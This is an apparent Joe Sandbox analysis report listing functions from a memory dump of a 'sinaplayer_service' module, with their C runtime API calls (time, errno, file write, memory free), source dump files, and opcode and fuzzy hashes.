                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time_errno$___time64_t_from_ft$FileSystem$ErrorFindLastLocalNextSpecific___loctotime32_t_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2841192990-0
                                                                                                                                                                                                    • Opcode ID: 3b47538e67cb5f2f74b6cd2b855fbfe8110ff5d261408acadd601a96dc799e2e
                                                                                                                                                                                                    • Instruction ID: 909d00ddd0b7ec7e706c831fd1dbabe692845e489ea2af3afdbf436fd1c73ef6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b47538e67cb5f2f74b6cd2b855fbfe8110ff5d261408acadd601a96dc799e2e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C621F8729086199BEB10EFB4DC447EEB3F8AF85314F11069AE925CB180E774D6818F71
                                                                                                                                                                                                    Function 6D095F93 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096067
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096079
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D09608B
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,6D0D4437,000007BC,00000001,00000001,00000000), ref: 6D096195
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000190,00000190,00000000,?,?), ref: 6D0D69D6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000190,00000190,00000000,?,?), ref: 6D0D69DC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000190,00000190,00000000,?,?), ref: 6D0D69E6
                                                                                                                                                                                                      • Part of subcall function 6D095BB2: _lock.MSVCR120(00000006,6D095BF0,0000000C,6D096173,?,00000000,?,0000003C,00000000,00000000,?,0000003C,00000000,-FFFFF984,?,00000018), ref: 6D095BC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_get_daylight_get_dstbias_get_timezone_invalid_parameter_noinfo_invoke_watson_lock
                                                                                                                                                                                                    • String ID: ;$;$d
                                                                                                                                                                                                    • API String ID: 106357551-2894727285
                                                                                                                                                                                                    • Opcode ID: ba9b653d8b88bf69496105ea866245dc3f007154873db99df76962db9a5a59cf
                                                                                                                                                                                                    • Instruction ID: 1ba2e6b9a25c7e732a477041d0feeeeb901bebeafbe46a0eb068edb5a8c86b48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba9b653d8b88bf69496105ea866245dc3f007154873db99df76962db9a5a59cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A57105B1E002199BEB14CF7DDC807EEB3F9AB48360F599126F914EB280E77099048BD0
                                                                                                                                                                                                    Function 6D0A2FC3 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(00000001,00000001,00000010,FFFFFEFF,?,00000000), ref: 6D0DD947
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6D0DD95D
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6D0DD96C
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6D0DD97F
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0DD986
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator=$NameName::Name::operator+atol
                                                                                                                                                                                                    • String ID: generic-type-$template-parameter-
                                                                                                                                                                                                    • API String ID: 1861674852-13229604
                                                                                                                                                                                                    • Opcode ID: ce6ed807e92089416a3e926c59d0495409598859c492fd6c099a089e20fd778d
                                                                                                                                                                                                    • Instruction ID: be68e97d81f9c36aa835d0c839ffa52e406e729564fd221311f7ea3133ac7612
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce6ed807e92089416a3e926c59d0495409598859c492fd6c099a089e20fd778d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B617E71D4420A9FEB04DFF9D850FFEB7B8AF09300F15402AE911A7291EB759A04CB60
                                                                                                                                                                                                    Function 6D0AC35B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(0]m,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0AC364
                                                                                                                                                                                                    • _write.MSVCR120(00000000,?,00000000,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0AC3D1
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0AC4E0
                                                                                                                                                                                                    • __p__iob.MSVCR120(00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0B13B7
                                                                                                                                                                                                    • __p__iob.MSVCR120(00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0B13C7
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0D51F6
                                                                                                                                                                                                    • __lseeki64.LIBCMT(00000000,00000000,00000000,00000002,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0D5236
                                                                                                                                                                                                    • _write.MSVCR120(00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0D5257
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob_errno_write$__lseeki64_fileno
                                                                                                                                                                                                    • String ID: 0]m
                                                                                                                                                                                                    • API String ID: 1504050362-866580982
                                                                                                                                                                                                    • Opcode ID: 6a3af94d99f7a64e1e004a9ec2a93a335ad56eaac5ce5e65800856e5842bc571
                                                                                                                                                                                                    • Instruction ID: 0fcd4f1b62c3474c82a2a5814edebbba3d6ef1504c68523c94ac5f770ad352f5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a3af94d99f7a64e1e004a9ec2a93a335ad56eaac5ce5e65800856e5842bc571
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E411676518B069FF7158EA8C880B7B77E4EF47320B09C61EE9B68B2D1D734D4408B55
                                                                                                                                                                                                    Function 6D0A4F0C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000001), ref: 6D0A79E7
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D0E7870), ref: 6D0D291E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CEE8,6D0E7870), ref: 6D0D2933
                                                                                                                                                                                                      • Part of subcall function 6D0A4EB3: __EH_prolog3.LIBCMT ref: 6D0A4EBA
                                                                                                                                                                                                      • Part of subcall function 6D0A4EB3: ??2@YAPAXI@Z.MSVCR120(000000D0), ref: 6D0A4ED9
                                                                                                                                                                                                      • Part of subcall function 6D0A4EB3: free.MSVCR120(00000000), ref: 6D0A4EFC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@CriticalExceptionH_prolog3LeaveSectionThrowfreestd::exception::exception
                                                                                                                                                                                                    • String ID: <)m$version
                                                                                                                                                                                                    • API String ID: 2663953338-2428076522
                                                                                                                                                                                                    • Opcode ID: 38aafc5acfced8a6b13b993d7e8b6ab8e29a65295cd0ea826b6965d88f9eae98
                                                                                                                                                                                                    • Instruction ID: 4962306c87e2485ca58c16174ca0587943d6e06ff79a6dc0ece7c7d574512d24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38aafc5acfced8a6b13b993d7e8b6ab8e29a65295cd0ea826b6965d88f9eae98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD416970A0430AEFEB55CFA5C485BADBBB4FF05304F14802AE9199B256D7B0E961CF91
                                                                                                                                                                                                    Function 6D0A6BF4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 113threadCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,.im), ref: 6D0A6C19
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0D24B7
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CFD8), ref: 6D0D24D2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002,00000001), ref: 6D0D24D8
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002), ref: 6D0D24EE
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0D24FC
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D250A
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000), ref: 6D0D251B
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000000), ref: 6D0D2544
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@ExceptionThrow$??0exception@std@@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCurrentErrorLastThreadVersion
                                                                                                                                                                                                    • String ID: .im
                                                                                                                                                                                                    • API String ID: 124800099-4014146257
                                                                                                                                                                                                    • Opcode ID: 160199be45a413335e26d9c2875f0db246ca16423133ca6586cfa6ea316e8f5a
                                                                                                                                                                                                    • Instruction ID: 2fa314308d966a2c9917683d8dbf7b6ffe54032af3cfbb5fff1a3745411099b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160199be45a413335e26d9c2875f0db246ca16423133ca6586cfa6ea316e8f5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB41FD7081821A8FFB60DFB8E8947BE77B4FB0AB04F41815BE605D7185EB748840CB90
                                                                                                                                                                                                    Function 6D0B0B56 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: operator+
                                                                                                                                                                                                    • String ID: cli::array<$cli::pin_ptr<$void$void
                                                                                                                                                                                                    • API String ID: 3839230940-456688812
                                                                                                                                                                                                    • Opcode ID: c00f9106503b27e008313f4f5e8e481ec53e30d2d5ea91b279391460016a1b99
                                                                                                                                                                                                    • Instruction ID: f35116303e4d7c0dee7b9d853561b26eef71f4815b312d928dad9c726ebd0192
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c00f9106503b27e008313f4f5e8e481ec53e30d2d5ea91b279391460016a1b99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F216B3151C209AFEF05CF98D950FEE3BB9BF0A318F44805AFA18A7291D7719A50CB94
                                                                                                                                                                                                    Function 6D097888 Relevance: 16.8, APIs: 11, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,000000FF,00000024), ref: 6D0978AF
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?), ref: 6D0978EA
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?), ref: 6D0978FC
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6D09790E
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(?,?), ref: 6D097942
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(?,?), ref: 6D09796C
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(?,?), ref: 6D097989
                                                                                                                                                                                                      • Part of subcall function 6D0976C5: memset.MSVCR120(?,000000FF,00000024), ref: 6D0976E3
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6A84
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D6A8E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6A9A
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0D6C07
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _gmtime64_s$_errnomemset$FeaturePresentProcessProcessorTerminate__crt_get_daylight_get_dstbias_get_timezone_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2714158224-0
                                                                                                                                                                                                    • Opcode ID: 3ec8e3e4a560eb1711b817554574e81bdaf72ebdba6a9da9e7fbee5e7d11d69b
                                                                                                                                                                                                    • Instruction ID: e9a2493b598d66ed0b81e6abf14f01c82a53a02913cf5318ac5d04333d7b7c00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ec8e3e4a560eb1711b817554574e81bdaf72ebdba6a9da9e7fbee5e7d11d69b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A81B572E04707AAF7149E7DCC41BAAB3E8EF45728F51922AE514DB280E7B0D9409BD0
                                                                                                                                                                                                    Function 6D10C2D8 Relevance: 16.7, APIs: 11, Instructions: 227stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strncat_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1948258708-0
                                                                                                                                                                                                    • Opcode ID: 4a93b4245a008af915d8153ed93840cd5733da35edd02bff04b0f78a44aa04a2
                                                                                                                                                                                                    • Instruction ID: 9e6f4768bce3a2b79ac829f6369923d9ba00fbfa5fdcbdbf886458df79563652
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a93b4245a008af915d8153ed93840cd5733da35edd02bff04b0f78a44aa04a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C81D43190824BDFCB01EF68C4906BEBBBABF55314F11815AE560DB28ADBB18941CF71
                                                                                                                                                                                                    Function 6D0F2305 Relevance: 16.6, APIs: 11, Instructions: 77COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F230C
                                                                                                                                                                                                    • free.MSVCR120(000000FF,?,00000024,000000FF,6D0E8C43,00000008,6D0F00EC), ref: 6D0F234D
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(000000FF,?,00000028,000000FF,6D0EF81C,00000008,6D0F00EC), ref: 6D0F237C
                                                                                                                                                                                                    • free.MSVCR120(?,00000008,6D0F00EC), ref: 6D0F2385
                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000008,6D0F00EC), ref: 6D0F239D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000008,6D0F00EC), ref: 6D0F23AC
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0F23B1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6D0F23C0
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0F23C5
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0F23CD
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 6D0F23E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$CloseFreeHandle$CriticalDeleteH_prolog3HeapSectionVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3338787333-0
                                                                                                                                                                                                    • Opcode ID: cc454e9429e466bb3e51d4fb16c47ef2aed03cf84f1afbcccd98ab73b547b368
                                                                                                                                                                                                    • Instruction ID: ca1a0054127f34dca671a35b4a408165d41eb3c6aaab67b9ca35777207273368
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc454e9429e466bb3e51d4fb16c47ef2aed03cf84f1afbcccd98ab73b547b368
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E219A70904612BBFF148FB0EC46BA9BBB4BF05304F21041AE600EB590CBB5B562CB90
                                                                                                                                                                                                    Function 6D0B00A6 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
